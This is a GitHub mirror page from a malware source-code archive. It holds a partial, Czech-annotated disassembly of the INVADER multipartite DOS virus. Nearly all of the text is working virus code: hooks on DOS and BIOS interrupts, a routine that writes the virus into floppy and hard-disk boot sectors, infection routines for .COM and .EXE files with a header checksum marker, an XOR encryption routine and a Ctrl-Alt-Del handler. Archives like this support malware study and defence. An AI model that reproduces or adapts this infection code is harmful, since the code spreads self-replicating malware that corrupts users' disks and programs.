ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
e2d9bb12d0
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.invdanub.asm
vxunderground a2f096eccc
Add files via upload
2021-01-12 17:47:04 -06:00

1196 lines
41 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;---------------------------------------------------------------------
; virus INVADER ziskan 21. 8. 1991 z knihvny (Baran)
; Jedna se o kombinovany virus napadajici BOOT sektor a .COM a .EXE
; soubory. Inspiraci pro EXE cast viru je JERUSALEM B virus.
;---------------------------------------------------------------------
AX=0000 BX=0000 CX=1064 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=48C5 ES=48C5 SS=48C5 CS=48C5 IP=0100 NV UP EI PL NZ NA PO NC
-10:0100 E92E0B JMP 0C31
0000 E9 2E 0B 01 00 F5 54 61-28 99 05 00 00 00 14 17 i....uTa(.......
0010 E0 41 90 19 64 00 C5 48-00 00 03 00 B8 00 50 01 `A..d.EH....8.P.
0020 8F 20 20 20 20 20 20 20-20 20 20 20 20 20 90 19 . ..
0030 20 20 20 20 20 20 20 20-01 00 34 0E 60 61 00 01 ..4.`a..
0040 20 20 F5 68 50 0D 41 00-00 25 01 00 00 00 00 01 uhP.A..%......
0050 50 41 43 41 44 2E 45 58-45 43 4F 4D 4D 41 4E 44 PACAD.EXECOMMAND
0060 2E 43 4F 4D 2E 43 4F 4D-2E 45 58 45 10 00 00 02 .COM.COM.EXE....
0070 00 00 80 00 30 BD 5C 00-30 BD 6C 00 30 BD 62 79 ....0=\.0=l.0=by
0080 20 49 6E 76 61 64 65 72-2C 20 46 65 6E 67 20 43 Invader, Feng C
0090 68 69 61 20 55 2E 2C 20-57 61 72 6E 69 6E 67 3A hia U., Warning:
00A0 20 44 6F 6E 27 74 20 72-75 6E 20 41 43 41 44 2E Don't run ACAD.
00B0 45 58 45 21 D8 0F 8E 0C-90 0A 90 0A 24 00 48 05 EXE!X.......$.H.
00C0 24 00 48 05 24 00 47 06-24 00 47 06 24 00 D8 0F $.H.$.G.$.G.$.X.
00D0 D8 0F 8E 0C 90 0A 90 0A-24 00 48 05 24 00 48 05 X.......$.H.$.H.
00E0 24 00 ED 05 24 00 ED 05-24 00 C1 10 C1 10 1D 0E $.m.$.m.$.A.A...
00F0 69 09 69 09 24 00 B4 04-24 00 B4 04 24 00 ED 05 i.i.$.4.$.4.$.m.
;=====================================================================
; Obsluha preruseni 8H
;
02B3 INT 3
CMP Byte Ptr CS:[003F],01
JZ 02DD
PUSH AX
MOV AX,CS:[003A]
CMP CS:[0003],AX
JA 02CD
INC Word Ptr CS:[0003]
02CD PUSH CX
MOV CX,CS:[0003]
02D3 NOP
LOOP 02D3
POP CX
POP AX
02D8 JMP 0DD5:00AB
02DD INC Word Ptr CS:[0003]
CMP Word Ptr CS:[0003],8000
JA 02ED
JMP 02D8
02ED PUSH DS
PUSH AX
PUSH BX
PUSH CS
POP DS
CMP Byte Ptr [0048],01
JNZ 02FC
JMP 0332
NOP
02FC MOV BX,[004B]
DEC Byte Ptr [004A]
JNZ 036D
IN AL,61
AND AL,FE
OUT 61,AL
MOV BX,[004B]
INC Word Ptr [004B]
CMP BX,0096
JNZ 031D
JMP 0352
NOP
031D MOV AL,[BX+01E0]
MOV [004A],AL
SHL BX,1
MOV AX,[BX+00B4]
CMP AX,0000
JZ 0332
JMP 033B
0332 IN AL,61
AND AL,FE
OUT 61,AL
JMP 036D
NOP
033B MOV BX,AX
MOV AL,B6
OUT 43,AL
MOV AX,BX
OUT 42,AL
MOV AL,AH
OUT 42,AL
IN AL,61
OR AL,03
OUT 61,AL
JMP 036D
0352 IN AL,61
AND AL,FE
OUT 61,AL
MOV Word Ptr [004B],0000
MOV Byte Ptr [004A],01
MOV AX,8000
AND AH,[0005]
MOV [0003],AX
036D POP BX
POP AX
POP DS
0370 JMP 02D8
;=====================================================================
; Obsluha preruseni 9H
;
0373 CLI
PUSH AX
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AL,[0417]
POP DS ; rozpoznani CTRL ALT DEL
AND AL,0C
CMP AL,0C ; Je CTRL -ALT
JNZ 03B8
IN AL,60
AND AL,7F
CMP AL,53 ; Je DEL
JNZ 03B8
MOV AX,CS:[0003]
MOV AH,[0049]
MOV CL,05
CMP Byte Ptr CS:[003F],01
JNZ 03AB
MOV CL,04
Word Ptr CS:[0003],8000
JB 03AB
MOV CL,01
03AB SHR AH,CL
CMP AL,AH
JA 03B8
03B1 MOV AL,20
OUT 20,AL
JMP 03BE
03B8 POP AX
03B9 JMP 0DD5:0125
03BE PUSH CS
.
. OBSLUHA CTRL ALT DEL + pomocne procedury
.
;==========================================================
;
;
04C1 DB 0
04C2 DW ?
;
;----------------------------------------------------------
; Cteni s RESETEM a opakovanim.
;
04C4 MOV Byte Ptr [04C1],00
MOV [04C2],AX
04CC CALL 04E9
AND AH,C3
JZ 04E8
MOV AH,00 ; RESET
CALL 04E9 ;-------------------------------
MOV AX,[04C2]
INC Byte Ptr [04C1]
CMP Byte Ptr [04C1],01
JBE 04CC
STC
04E8 RET
04E9 PUSHF ; Volani puvodni obsluhy
CALL FAR CS:[0634] ; preruseni 13H.
RET
;=====================================================================
; Obsluha preruseni 13H
;
04F0 80FC02 CMP AH,02 ; operace cteni ?
04F3 751B JNZ 0510
04F5 F6C280 TEST DL,80
04F8 751A JNZ 0514
04FA 80FA02 CMP DL,02
04FD 7711 JA 0510
04FF 83F902 CMP CX,+02 ; pro disketu 2 sektor,
0502 750C JNZ 0510 ; 0 stopa
0504 80FE00 CMP DH,00 ; 0 hlava
0507 7507 JNZ 0510
0509 EB13 JMP 051E
050B 90 NOP
050C DB 01, 00, 80, 01
0510 E92001 JMP 0633 ; KONEC
513 DB 00
0614 80FE01 CMP DH,01 ; pro disk libovolny sektor
0517 75F7 JNZ 0510 ; 1 hlava
0519 80FD00 CMP CH,00 ; 0 stopa
051C 75F2 JNZ 0510
051E 2E803E130502 CMP Byte Ptr CS:[0513],02
0524 7407 JZ 052D
0526 2EFE061305 INC Byte Ptr CS:[0513]
052B EBE3 JMP 0510
052D 2EC606130500 MOV Byte Ptr CS:[0513],00
0533 2E803E480001 CMP Byte Ptr CS:[0048],01
0539 74D5 JZ 0510
053B 50 PUSH AX
053C 53 PUSH BX
053D 51 PUSH CX
053E 52 PUSH DX
053F 56 PUSH SI
0540 57 PUSH DI
0541 06 PUSH ES
0542 1E PUSH DS
0543 8CC8 MOV AX,CS
0545 8ED8 MOV DS,AX
0547 8EC0 MOV ES,AX
0549 88164D00 MOV [004D],DL
054D B400 MOV AH,00
054F E897FF CALL 04E9 ; RESET ZARIZENI
0552 BB0010 MOV BX,1000
0555 B80102 MOV AX,0201
0558 B90100 MOV CX,0001
055B B600 MOV DH,00
055D E889FF CALL 04E9 ; NACTI BOOT SEKTOR
0560 7243 JB 05A5
0562 F6C280 TEST DL,80
0565 7405 JZ 056C
0567 E8CE00 CALL 0638 ; PRO PEVNY DISK BOOT SEKTOR
056A 7239 JB 05A5 ; AKTIVNI PARTITION
056C B8CB3C MOV AX,3CCB ; Je virus pritomny ?
056F 39473E CMP [BX+3E],AX
0572 7518 JNZ 058C
0574 8B4740 MOV AX,[BX+40]
0577 3DFEFF CMP AX,FFFE
057A 7429 JZ 05A5
057C 2B4742 SUB AX,[BX+42]
057F 3D0400 CMP AX,0004
0582 7508 JNZ 058C
0584 E8E300 CALL 066A
0587 7303 JNB 058C
0589 E99F00 JMP 062B
058C F6064D0080 TEST Byte Ptr [004D],80
0591 7415 JZ 05A8
0593 C6064F0007 MOV Byte Ptr [004F],07 ; kam ulozit virus
0598 C606500000 MOV Byte Ptr [0050],00 ; u pevneho disku
059D C6064E0000 MOV Byte Ptr [004E],00
05A2 EB3F JMP 05E3
05A4 90 NOP
05A5 E98300 JMP 062B
05A8 C6064F0001 MOV Byte Ptr [004F],01 ; kam ulozit virus
05AD C606500028 MOV Byte Ptr [0050],28 ; u diskety
05B2 8A4715 MOV AL,[BX+15]
05B5 3CFC CMP AL,FC
05B7 7305 JNB 05BE
05B9 C606500050 MOV Byte Ptr [0050],50
05BE A05000 MOV AL,[0050]
05C1 BB8F02 MOV BX,028F
05C4 B90900 MOV CX,0009
05C7 8807 MOV [BX],AL ; U diskety zaroven
05C9 83C304 ADD BX,+04 ; preformatuj nultou
05CC E2F9 LOOP 05C7 ; stopu.
05CE B80905 MOV AX,0509
05D1 BB8F02 MOV BX,028F
05D4 C6064E0000 MOV Byte Ptr [004E],00
05D9 C6064F0001 MOV Byte Ptr [004F],01
05DE E8AD00 CALL 068E
05E1 7248 JB 062B
05E3 BB0000 MOV BX,0000 ; Zapis virus.
05E6 A14F00 MOV AX,[004F]
05E9 A3440E MOV [0E44],AX
05EC A14D00 MOV AX,[004D]
05EF A3460E MOV [0E46],AX
05F2 B80903 MOV AX,0309
05F5 E89600 CALL 068E ;-----------------------
05F8 7231 JB 062B
05FA C6064F0001 MOV Byte Ptr [004F],01
05FF C606500000 MOV Byte Ptr [0050],00
0604 F6C280 TEST DL,80
0607 740C JZ 0615
0609 A10C05 MOV AX,[050C]
060C A34F00 MOV [004F],AX
060F A10E05 MOV AX,[050E]
0612 A34D00 MOV [004D],AX
0615 BE0310 MOV SI,1003
0618 BF030E MOV DI,0E03
061B B92500 MOV CX,0025
061E 90 NOP
061F FC CLD
0620 F3A4 REPZ MOVSB
0622 BB000E MOV BX,0E00 ; Zapis virus do BOOT sektoru.
0625 B80103 MOV AX,0301
0628 E86300 CALL 068E
062B 1F POP DS
062C 07 POP ES
062D 5F POP DI
062E 5E POP SI
062F 5A POP DX
0630 59 POP CX
0631 5B POP BX
0632 58 POP AX
0633 EA88227000 JMP 0070:2288
;------------------------------------------------------------------
; Pro pevny disk nalezeni aktivni PARTITION a nacteni BOOT sektoru.
;
0638 MOV SI,11BE
MOV BL,04
063D CMP Byte Ptr [SI],80
JZ 0650
CMP Byte Ptr [SI],00
JNZ 064E
ADD SI,+10
DEC BL
JNZ 063D
064E STC
RET
0650 MOV AX,[SI]
MOV [050E],AX
MOV AX,[SI+02]
MOV [050C],AX
MOV DX,[SI]
MOV CX,[SI+02]
MOV AX,0201
MOV BX,1000
CALL 04C4
RET
066A 8B4740 MOV AX,[BX+40]
066D 33D2 XOR DX,DX
066F F77718 DIV Word Ptr [BX+18]
0672 FEC2 INC DL
0674 88164F00 MOV [004F],DL
0678 33D2 XOR DX,DX
067A F7771A DIV Word Ptr [BX+1A]
067D 88164E00 MOV [004E],DL
0681 A25000 MOV [0050],AL
0684 B80102 MOV AX,0201
0687 BB0010 MOV BX,1000
068A E80100 CALL 068E
068D C3 RET
068E 8B0E4F00 MOV CX,[004F]
0692 8B164D00 MOV DX,[004D]
0696 E82BFE CALL 04C4
0699 C3 RET
;=====================================================================
; Obsluha preruseni 21H
;
069A 9C PUSHF
069B 3D4342 CMP AX,4243 ; test pritommnosti viru
069E 7505 JNZ 06A5
06A0 B87856 MOV AX,5678
06A3 9D POPF
06A4 CF IRET
06A5 3D4442 CMP AX,4244
06A8 741F JZ 06C9
06AA 3D004B CMP AX,4B00 ; EXEC
06AD 7503 JNZ 06B2
06AF EB2E JMP 06DF
06B1 90 NOP
06B2 3D003D CMP AX,3D00
06B5 750B JNZ 06C2
06B7 2E803E3E0001 CMP Byte Ptr [003E],01
06BD 7403 JZ 06C2
06BF EB1E JMP 06DF
06C2 CC INT 3
06C3 9D POPF
06C4 EA14021C10 JMP 101C:0214
06C9 58 POP AX
06CA 58 POP AX
06CB 58 POP AX
06CC 2EA3DD06 MOV CS:[06DD],AX
06D0 F3A4 REPZ MOVSB
06D2 9D POPF
06D3 E87703 CALL 0A4D
06D6 8B0E1400 MOV CX,[0014]
06DA EA0001EE13 JMP 13EE:0100
;====================================================================
; obsluha sluzby EXEC
;
06DF 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF
06E6 2EC70638000000 MOV Word Ptr CS:[0038],0000
06ED 2E89160600 MOV CS:[0006],DX
06F2 2E8C1E0800 MOV CS:[0008],DS
06F7 50 PUSH AX
06F8 53 PUSH BX
06F9 51 PUSH CX
06FA 52 PUSH DX
06FB 56 PUSH SI
06FC 57 PUSH DI
06FD 1E PUSH DS
06FE 06 PUSH ES
06FF FC CLD
0700 8BF2 MOV SI,DX
0702 8A04 MOV AL,[SI] ; konverze jmena na velka
0704 0AC0 OR AL,AL ; pismena.
0706 740E JZ 0716
0708 3C61 CMP AL,61 ;'a'
070A 7207 JB 0713
070C 3C7A CMP AL,7A ;'z'
070E 7703 JA 0713
0710 802C20 SUB Byte Ptr [SI],20 ;' '
0713 46 INC SI
0714 EBEC JMP 0702
0716 2E89363C00 MOV CS:[003C],SI ; ukazatel za jmeno
071B 8BC6 MOV AX,SI
071D 0E PUSH CS
071E 07 POP ES
071F B90B00 MOV CX,000B
0722 2BF1 SUB SI,CX
0724 BF5900 MOV DI,0059 ; nenapadame COMMAND.COM
0727 F3A6 REPZ CMPSB
0729 7503 JNZ 072E
072B E9EA02 JMP 0A18
072E 8BF0 MOV SI,AX
0730 B90800 MOV CX,0008
0733 2BF1 SUB SI,CX
0735 BF5100 MOV DI,0051
0738 F3A6 REPZ CMPSB ; a ACAD.EXE
073A 751F JNZ 075B
073C E81903 CALL 0A58
073F 2E803E3F0001 CMP Byte Ptr CS:[003F],01
0745 7409 JZ 0750
0747 2E83063A001E ADD Word Ptr CS:[003A],+1E
074D EB08 JMP 0757
074F 90 NOP
0750 2E810603000004 ADD Word Ptr CS:[0003],0400
0757 F9 STC
0758 EB0D JMP 0767
075A 90 NOP
075B B80043 MOV AX,4300 ; atributy souboru
075E CD21 INT 21 ;----------------------
0760 7205 JB 0767
0762 2E890E0C00 MOV CS:[000C],CX
0767 726F JB 07D8
0769 32C0 XOR AL,AL
076B 2EA21B00 MOV CS:[001B],AL
076F 2E8B363C00 MOV SI,CS:[003C]
0774 B90400 MOV CX,0004
0777 2BF1 SUB SI,CX
0779 BF6400 MOV DI,0064 ; porovname s .COM
077C F3A6 REPZ CMPSB
077E 741A JZ 079A
0780 2EFE061B00 INC Byte Ptr CS:[001B]
0785 2E8B363C00 MOV SI,CS:[003C]
078A B90400 MOV CX,0004
078D 2BF1 SUB SI,CX
078F BF6800 MOV DI,0068
0792 F3A6 REPZ CMPSB ; a .EXE
0794 7404 JZ 079A
0796 F9 STC
0797 EB3F JMP 07D8
0799 90 NOP
079A 8BFA MOV DI,DX
079C 32D2 XOR DL,DL
079E 807D013A CMP Byte Ptr [DI+01],3A ;':'
07A2 7505 JNZ 07A9
07A4 8A15 MOV DL,[DI]
07A6 80E21F AND DL,1F
07A9 B436 MOV AH,36 ; Zjisti volny prostor
07AB CD21 INT 21 ; na disku.
07AD 3DFFFF CMP AX,FFFF ;
07B0 7503 JNZ 07B5 ;
07B2 E96302 JMP 0A18 ;
07B5 F7E3 MUL BX ;
07B7 F7E1 MUL CX ;
07B9 0BD2 OR DX,DX ;
07BB 7505 JNZ 07C2 ;
07BD 3D0010 CMP AX,1000 ;
07C0 72F0 JB 07B2 ;----------------------
07C2 2E8B160600 MOV DX,CS:[0006]
07C7 B8003D MOV AX,3D00 ; otevri soubor
07CA 2EC6063E0001 MOV Byte Ptr CS:[003E],01
07D0 CD21 INT 21
07D2 2EC6063E0000 MOV Byte Ptr CS:[003E],00
07D8 7267 JB 0841
07DA 2EA30A00 MOV CS:[000A],AX
07DE 8BD8 MOV BX,AX
07E0 B80242 MOV AX,4202 ; SEEK na konec - 5
07E3 B9FFFF MOV CX,FFFF
07E6 BAFBFF MOV DX,FFFB
07E9 CD21 INT 21
07EB 7254 JB 0841
07ED 050500 ADD AX,0005
07F0 2EA31400 MOV CS:[0014],AX
07F4 B80042 MOV AX,4200
07F7 B90000 MOV CX,0000 ; SEEK na zacatek + 12
07FA BA1200 MOV DX,0012
07FD CD21 INT 21
07FF 7240 JB 0841
0801 B90200 MOV CX,0002
0804 BA3600 MOV DX,0036
0807 8BFA MOV DI,DX
0809 8CC8 MOV AX,CS
080B 8ED8 MOV DS,AX
080D 8EC0 MOV ES,AX
080F B43F MOV AH,3F ; precteme 2 byte
0811 CD21 INT 21
0813 8B05 MOV AX,[DI]
0815 3D9019 CMP AX,1990 ; Pokud jsou 1990, koncime.
0818 7507 JNZ 0821
081A B43E MOV AH,3E
081C CD21 INT 21
081E E9F701 JMP 0A18
0821 B82435 MOV AX,3524 ; redefinice preruseni 24H
0824 CD21 INT 21
0826 891E230A MOV [0A23],BX
082A 8C06250A MOV [0A25],ES
082E BA270A MOV DX,0A27
0831 B82425 MOV AX,2524
0834 CD21 INT 21 ;--------------------------
0836 C5160600 LDS DX,[0006]
083A 33C9 XOR CX,CX
083C B80143 MOV AX,4301 ; nastav atributy
083F CD21 INT 21
0841 723B JB 087E
0843 2E8B1E0A00 MOV BX,CS:[000A]
0848 B43E MOV AH,3E ; zavri soubor
084A CD21 INT 21
084C 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF
0853 B8023D MOV AX,3D02 ; otevri v R/W modu
0856 CD21 INT 21
0858 7224 JB 087E
085A 2EA30A00 MOV CS:[000A],AX
085E 8CC8 MOV AX,CS
0860 8ED8 MOV DS,AX
0862 8EC0 MOV ES,AX
0864 8B1E0A00 MOV BX,[000A]
0868 B80057 MOV AX,5700 ; datum posledni modifikace
086B CD21 INT 21
086D 89160E00 MOV [000E],DX
0871 890E1000 MOV [0010],CX
0875 B80042 MOV AX,4200 ; seek na zacatek
0878 33C9 XOR CX,CX
087A 8BD1 MOV DX,CX
087C CD21 INT 21
087E 7255 JB 08D5
0880 803E1B0000 CMP Byte Ptr [001B],00
0885 7403 JZ 088A
0887 EB6B JMP 08F4
;---------------------------------------------------------------
; OBSLUHA .COM souboru.
;
088A BB0010 MOV BX,1000
088D B448 MOV AH,48
088F CD21 INT 21
0891 730B JNB 089E
0893 B43E MOV AH,3E
0895 8B1E0A00 MOV BX,[000A]
0899 CD21 INT 21
089B E97A01 JMP 0A18
089E FF063800 INC Word Ptr [0038]
08A2 8EC0 MOV ES,AX
08A4 33F6 XOR SI,SI
08A6 8BFE MOV DI,SI
08A8 A10300 MOV AX,[0003]
08AB 0C01 OR AL,01
08AD A20500 MOV [0005],AL
08B0 C606480001 MOV Byte Ptr [0048],01
08B5 E87201 CALL 0A2A
08B8 B90010 MOV CX,1000
08BB F3A4 REPZ MOVSB
08BD E86A01 CALL 0A2A
08C0 C606480000 MOV Byte Ptr [0048],00
08C5 8BD7 MOV DX,DI
08C7 8B0E1400 MOV CX,[0014]
08CB 8B1E0A00 MOV BX,[000A]
08CF 06 PUSH ES
08D0 1F POP DS
08D1 B43F MOV AH,3F
08D3 CD21 INT 21
08D5 7215 JB 08EC
08D7 03F9 ADD DI,CX
08D9 7211 JB 08EC
08DB 33C9 XOR CX,CX
08DD 8BD1 MOV DX,CX
08DF B80042 MOV AX,4200
08E2 CD21 INT 21
08E4 8BCF MOV CX,DI
08E6 33D2 XOR DX,DX
08E8 B440 MOV AH,40
08EA CD21 INT 21
08EC 7210 JB 08FE
08EE E86701 CALL 0A58
08F1 E9DF00 JMP 09D3
;---------------------------------------------------------------
; OBSLUHA .EXE souboru.
;
08F4 B91C00 MOV CX,001C ; nacteni .EXE headeru
08F7 BA1C00 MOV DX,001C
08FA B43F MOV AH,3F
08FC CD21 INT 21
08FE 7252 JB 0952
0900 813E2E009019 CMP Word Ptr [002E],1990 ; kontrolni suma
0906 744A JZ 0952
0908 C7062E009019 MOV Word Ptr [002E],1990
090E A12A00 MOV AX,[002A] ; SS
0911 A34200 MOV [0042],AX
0914 A12C00 MOV AX,[002C] ; SP
0917 A34000 MOV [0040],AX
091A A13000 MOV AX,[0030] ; IP
091D A3A60B MOV [0BA6],AX
0920 A13200 MOV AX,[0032] ; CS
0923 A3A80B MOV [0BA8],AX
0926 A12000 MOV AX,[0020] ; pocet bloku
0929 833E1E0000 CMP Word Ptr [001E],+00
092E 7401 JZ 0931
0930 48 DEC AX
0931 F7266E00 MUL Word Ptr [006E]
0935 03061E00 ADD AX,[001E] ; byte v poslednim bloku
0939 83D200 ADC DX,+00
093C 050F00 ADD AX,000F
093F 83D200 ADC DX,+00
0942 25F0FF AND AX,FFF0
0945 A34400 MOV [0044],AX
0948 89164600 MOV [0046],DX
094C 050010 ADD AX,1000
094F 83D200 ADC DX,+00
0952 723A JB 098E
0954 F7366E00 DIV Word Ptr [006E]
0958 0BD2 OR DX,DX
095A 7401 JZ 095D
095C 40 INC AX
095D A32000 MOV [0020],AX
0960 89161E00 MOV [001E],DX
0964 A14400 MOV AX,[0044]
0967 8B164600 MOV DX,[0046]
096B F7366C00 DIV Word Ptr [006C]
096F 2B062400 SUB AX,[0024]
0973 A33200 MOV [0032],AX
0976 C7063000630B MOV Word Ptr [0030],0B63
097C A32A00 MOV [002A],AX
097F C7062C00FE0D MOV Word Ptr [002C],0DFE
0985 33C9 XOR CX,CX
0987 8BD1 MOV DX,CX
0989 B80042 MOV AX,4200
098C CD21 INT 21
098E 720A JB 099A
0990 B91C00 MOV CX,001C
0993 BA1C00 MOV DX,001C
0996 B440 MOV AH,40
0998 CD21 INT 21
099A 7211 JB 09AD
099C 3BC1 CMP AX,CX
099E 7533 JNZ 09D3
09A0 8B164400 MOV DX,[0044]
09A4 8B0E4600 MOV CX,[0046]
09A8 B80042 MOV AX,4200
09AB CD21 INT 21
09AD 7224 JB 09D3
09AF A10300 MOV AX,[0003]
09B2 0C01 OR AL,01
09B4 A20500 MOV [0005],AL
09B7 C606480001 MOV Byte Ptr [0048],01
09BC E86B00 CALL 0A2A
09BF 33D2 XOR DX,DX
09C1 B90010 MOV CX,1000
09C4 B440 MOV AH,40
09C6 CD21 INT 21
09C8 E85F00 CALL 0A2A
09CB C606480000 MOV Byte Ptr [0048],00
09D0 E88500 CALL 0A58
09D3 2E833E380000 CMP Word Ptr CS:[0038],+00
09D9 7404 JZ 09DF
09DB B449 MOV AH,49
09DD CD21 INT 21
09DF 2E833E0A00FF CMP Word Ptr CS:[000A],-01
09E5 7431 JZ 0A18
09E7 2E8B1E0A00 MOV BX,CS:[000A]
09EC 2E8B160E00 MOV DX,CS:[000E]
09F1 2E8B0E1000 MOV CX,CS:[0010]
09F6 B80157 MOV AX,5701
09F9 CD21 INT 21
09FB B43E MOV AH,3E
09FD CD21 INT 21
09FF 2EC5160600 LDS DX,CS:[0006]
0A04 2E8B0E0C00 MOV CX,CS:[000C]
0A09 B80143 MOV AX,4301
0A0C CD21 INT 21
0A0E 2EC516230A LDS DX,CS:[0A23]
0A13 B82425 MOV AX,2524
0A16 CD21 INT 21
0A18 07 POP ES
0A19 1F POP DS
0A1A 5F POP DI
0A1B 5E POP SI
0A1C 5A POP DX
0A1D 59 POP CX
0A1E 5B POP BX
0A1F 58 POP AX
0A20 E99FFC JMP 06C2
0A23 BF0563 MOV DI,6305
0A26 16 PUSH SS
;===============================================================
; Obsluha preruseni 24H
;
0A27 32C0 XOR AL,AL
0A29 CF IRET
;=====================================================================
; KODOVACI PROCEDURA kodujeme od 51H o delce 262H.
;
0A2A 1E PUSH DS
0A2B 06 PUSH ES
0A2C 57 PUSH DI
0A2D 56 PUSH SI
0A2E 51 PUSH CX
0A2F 50 PUSH AX
0A30 0E PUSH CS
0A31 07 POP ES
0A32 0E PUSH CS
0A33 1F POP DS
0A34 BE5100 MOV SI,0051
0A37 8BFE MOV DI,SI
0A39 B96202 MOV CX,0262
0A3C 8A260500 MOV AH,[0005]
0A40 AC LODSB
0A41 32C4 XOR AL,AH
0A43 AA STOSB
0A44 E2FA LOOP 0A40
0A46 58 POP AX
0A47 59 POP CX
0A48 5E POP SI
0A49 5F POP DI
0A4A 07 POP ES
0A4B 1F POP DS
0A4C C3 RET
0A4D 33C0 XOR AX,AX
0A4F 8BD8 MOV BX,AX
0A51 8BD0 MOV DX,AX
0A53 8BF0 MOV SI,AX
0A55 8BF8 MOV DI,AX
0A57 C3 RET
0A58 2EFE064900 INC Byte Ptr CS:[0049]
0A5D C3 RET
0A5E 1E PUSH DS
0A5F 0E PUSH CS
0A60 1F POP DS
0A61 B400 MOV AH,00
0A63 CD1A INT 1A
0A65 8BDA MOV BX,DX
0A67 CD1A INT 1A
0A69 3BDA CMP BX,DX
0A6B 74FA JZ 0A67
0A6D 33F6 XOR SI,SI
0A6F 8BDA MOV BX,DX
0A71 CD1A INT 1A
0A73 46 INC SI
0A74 3BDA CMP BX,DX
0A76 74F9 JZ 0A71
0A78 8BDE MOV BX,SI
0A7A D1E3 SHL BX,1
0A7C 891E3A00 MOV [003A],BX
0A80 C6063F0000 MOV Byte Ptr [003F],00
0A85 C606480000 MOV Byte Ptr [0048],00
0A8A E440 IN AL,40
0A8C 8AE0 MOV AH,AL
0A8E E440 IN AL,40
0A90 8AC4 MOV AL,AH
0A92 2E32060500 XOR AL,CS:[0005]
0A97 3C1F CMP AL,1F
0A99 7705 JA 0AA0
0A9B C6063F0001 MOV Byte Ptr [003F],01
0AA0 C70603000100 MOV Word Ptr [0003],0001
0AA6 C7064B000000 MOV Word Ptr [004B],0000
0AAC C6064A0001 MOV Byte Ptr [004A],01
0AB1 C6063E0000 MOV Byte Ptr [003E],00
0AB6 C606730F00 MOV Byte Ptr [0F73],00
0ABB 90 NOP
0ABC 1F POP DS
0ABD C3 RET
;=====================================================================
;
;
-10:0BBE 1E PUSH DS
-10:0BBF 06 PUSH ES
-10:0BC0 33C0 XOR AX,AX
-10:0BC2 8ED8 MOV DS,AX
-10:0BC4 A11304 MOV AX,[0413] ; velikost pammeti v KB
-10:0BC7 B106 MOV CL,06 ; prepocet na paragrafy
-10:0BC9 D3E0 SHL AX,CL
-10:0BCB 8ED8 MOV DS,AX
-10:0BCD 33F6 XOR SI,SI ; Na konci pameti hledame
-10:0BCF 8B443E MOV AX,[SI+3E] ; zda je virus pritommny.
-10:0BD2 3DCB3C CMP AX,3CCB
-10:0BD5 7434 JZ 0C0B ;
-10:0BD7 833E400EFE CMP Word Ptr [0E40],-02
-10:0BDC 7403 JZ 0BE1
-10:0BDE EB4E JMP 0C2E
-10:0BE0 90 NOP
-10:0BE1 FA CLI
-10:0BE2 B3FF MOV BL,FF
-10:0BE4 B84342 MOV AX,4243
-10:0BE7 CD21 INT 21
-10:0BE9 3D7856 CMP AX,5678
-10:0BEC 741A JZ 0C08
-10:0BEE C606740F01 MOV Byte Ptr [0F74],01
-10:0BF3 90 NOP
-10:0BF4 FB STI
-10:0BF5 B82135 MOV AX,3521
-10:0BF8 CD21 INT 21
-10:0BFA 891EC506 MOV [06C5],BX
-10:0BFE 8C06C706 MOV [06C7],ES
-10:0C02 BA9A06 MOV DX,069A
-10:0C05 B82125 MOV AX,2521
-10:0C08 EB24 JMP 0C2E
-10:0C0A 90 NOP
-10:0C0B C7443EFEFF MOV Word Ptr [SI+3E],FFFE
-10:0C10 33C0 XOR AX,AX
-10:0C12 8ED8 MOV DS,AX
-10:0C14 8EC0 MOV ES,AX
-10:0C16 BE0402 MOV SI,0204
-10:0C19 BF2000 MOV DI,0020
-10:0C1C B90200 MOV CX,0002
-10:0C1F FA CLI
-10:0C20 F3 A5 REPZ MOVSW
-10:0C22 FB STI
-10:0C23 BE0C02 MOV SI,020C
-10:0C26 BF4C00 MOV DI,004C
-10:0C29 B90200 MOV CX,0002
-10:0C2C F3 A5 REPZ MOVSW
-10:0C2E 07 POP ES
-10:0C2F 1F POP DS
-10:0C30 C3 RET
;---------------------------------------------------------------------
; pocatek viru pro COM
;
-10:0C31 E88AFF CALL 0BBE
-10:0C34 B3FF MOV BL,FF
-10:0C36 B84342 MOV AX,4243
-10:0C39 CD21 INT 21
-10:0C3B 3D7856 CMP AX,5678
-10:0C3E 7513 JNZ 0C53
-10:0C40 B84442 MOV AX,4244
-10:0C43 BF0001 MOV DI,0100
-10:0C46 2E8B8D1400 MOV CX,CS:[DI+0014]
-10:0C4B BE0010 MOV SI,1000
-10:0C4E 03F7 ADD SI,DI
-10:0C50 FC CLD
-10:0C51 CD21 INT 21
-10:0C53 8CCB MOV BX,CS
-10:0C55 83C310 ADD BX,+10
-10:0C58 8ED3 MOV SS,BX
-10:0C5A BCEE0D MOV SP,0DEE
-10:0C5D 53 PUSH BX
-10:0C5E BB630B MOV BX,0B63
-10:0C61 53 PUSH BX
-10:0C62 CB RETF
;---------------------------------------------------------------------
; ZDE POKRACUJEME PO RETF (C62) + pocatek pro EXE
;
AX=0006 BX=0B63 CX=1006 DX=0000 SP=0DEE BP=0000 SI=0000 DI=0000
DS=48C5 ES=48C5 SS=CS CS=CS IP=0B63 NV UP EI PL NZ NA PO NC
0B63 FC CLD
0B64 06 PUSH ES
0B65 E856FF CALL 0ABE (procedura BBE)
0B68 2E8C061600 MOV CS:[0016],ES
0B6D 2E8C067400 MOV CS:[0074],ES
0B72 2E8C067800 MOV CS:[0078],ES
0B77 2E8C067C00 MOV CS:[007C],ES
0B7C 8CC3 MOV BX,ES
0B7E 83C310 ADD BX,+10
0B81 2E011EA80B ADD CS:[0BA8],BX
0B86 2E011E4200 ADD CS:[0042],BX
0B8B B3FF MOV BL,FF
0B8D B84342 MOV AX,4243
0B90 CD21 INT 21
0B92 3D7856 CMP AX,5678
0B95 7513 JNZ 0BAA
0B97 07 POP ES
0B98 2E8E164200 MOV SS,CS:[0042]
0B9D 2E8B264000 MOV SP,CS:[0040]
0BA2 E8A8FE CALL 0A4D
